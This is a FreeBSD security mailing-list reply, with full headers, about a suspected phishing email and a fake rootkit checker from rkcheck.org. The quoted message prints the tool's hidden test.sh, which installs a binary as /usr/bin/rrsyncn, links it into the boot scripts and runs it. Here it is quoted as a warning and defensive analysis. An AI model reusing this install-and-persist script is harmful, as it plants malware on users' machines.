From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:41:26 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 09E764FA for ; Wed, 25 Feb 2015 20:41:26 +0000 (UTC) Received: from mail-qc0-x233.google.com (mail-qc0-x233.google.com [IPv6:2607:f8b0:400d:c01::233]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id A7A3F3F9 for ; Wed, 25 Feb 2015 20:41:25 +0000 (UTC) Received: by qcwb13 with SMTP id b13so5119516qcw.6 for ; Wed, 25 Feb 2015 12:41:24 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ftfl.ca; s=google; h=from:to:cc:subject:references:date:in-reply-to:message-id :user-agent:mime-version:content-type; bh=Jgf+BsrDJ42+aUszNJ0uqiztO96ODWhkN+DQHhDjYYM=; b=bDiaaaLPtYUpLKrn7KlmpbBk/NU/OzamRWNaPBlRiCeqkTxyamMdKVvXCQNlhp7krq DXQ9AlBTv9C3IGsR4E7yEXuxNYftNktA/p3QWRL+lsCUsnYdhMyXDM/6w61zAoIy5xxQ mNB8t2xhmhL741TPPfdeBrZaFI2WCaFDC/bIk= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:from:to:cc:subject:references:date:in-reply-to :message-id:user-agent:mime-version:content-type; bh=Jgf+BsrDJ42+aUszNJ0uqiztO96ODWhkN+DQHhDjYYM=; b=jGfMOhqZQxyaHWf15LCLS/Caz3H0U/hoPWPn2io85AAAh5lroZ0c2+W/nKYp4t8LC4 as4NmBqUm8lT69fT0X3vDMHDBuhXE2DegKOgeaicCiCi1e/zK0vjcuLQdf4tzd0DVvFP Ba2dG7+zEcT9IIILcLxQI7vJ6RZ34lpouGE3zV6a3+dTuCXom85YiB1eV6xqYNxbrcVO bHIKYq/Gc6MlHExamJUdkh9GOjdbhsFDeIuHLPfD8BF/XWH4PKTnOEjn2wxKGoi/ikOX BcmKY/dbDGS/uHjmiQMG7WQmsDwHvvqzUMTt8bej38btYyPETfnmk4pDyMlz3s9pWzE8 n0mg== X-Gm-Message-State: ALoCoQlcrOiVZdXbglN/LKLhqvBy+7N/VMwGhwcgkHjuS2sdNvo/uX7cilX/OYy+LCThIQHZUgOn X-Received: by 10.140.43.199 with SMTP id e65mr10711854qga.34.1424896884729; Wed, 25 Feb 2015 12:41:24 -0800 (PST) Received: from gly.ftfl.ca.ftfl.ca (Dynamic34-29.Dynamic.Dal.Ca. [129.173.34.203]) by mx.google.com with ESMTPSA id k47sm6262163qgd.2.2015.02.25.12.41.21 (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 25 Feb 2015 12:41:22 -0800 (PST) From: Joseph Mingrone To: Philip Jocks Subject: Re: has my 10.1-RELEASE system been compromised References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> Date: Wed, 25 Feb 2015 16:41:19 -0400 In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> (Philip Jocks's message of "Wed, 25 Feb 2015 21:34:21 +0100") Message-ID: <86bnkhyb9s.fsf@gly.ftfl.ca> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4 (berkeley-unix) MIME-Version: 1.0 Content-Type: text/plain Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:41:26 -0000 Philip Jocks writes: > it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which > was registered a few days ago and looks like a tampered version of chkrootkit. I > hope, nobody installed it anywhere, it seems to execute > rkcheck/tests/.unit/test.sh which contains > > #!/bin/bash > > cp tests/.unit/test /usr/bin/rrsyncn > chmod +x /usr/bin/rrsyncn > rm -fr /etc/rc2.d/S98rsyncn > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > /usr/bin/rrsyncn > exit > > That doesn't look like something you'd want on your box... I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems. Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful. Joseph